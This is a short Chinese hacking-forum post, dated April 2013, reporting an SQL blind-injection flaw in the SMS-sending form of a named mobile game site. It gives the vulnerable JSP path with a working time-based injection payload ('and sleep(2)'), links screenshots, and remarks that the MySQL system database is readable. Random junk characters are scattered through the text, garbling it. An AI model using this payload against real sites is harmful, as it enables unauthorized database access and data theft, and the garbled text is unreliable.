简要描述:0 K- c0 b5 l. m: S+ c1 c f, u
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。6 {3 @3 p- g4 ?7 ]
/ x5 | r) l- s* }4 w8 J
详细说明:
8 @- {3 Y9 F2 c( b存在SQL盲注url:) k& C6 Q. a7 B5 F, p
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
" O/ `! n7 t6 }% @( xhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png( c: Q, x3 @/ \7 n( _
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png5 `( [& t4 m2 P. i, h ]: `% V. W
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg+ M( ]9 J5 n* a' `; `! X: Z
; b7 {0 B& S1 F3 d; j能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对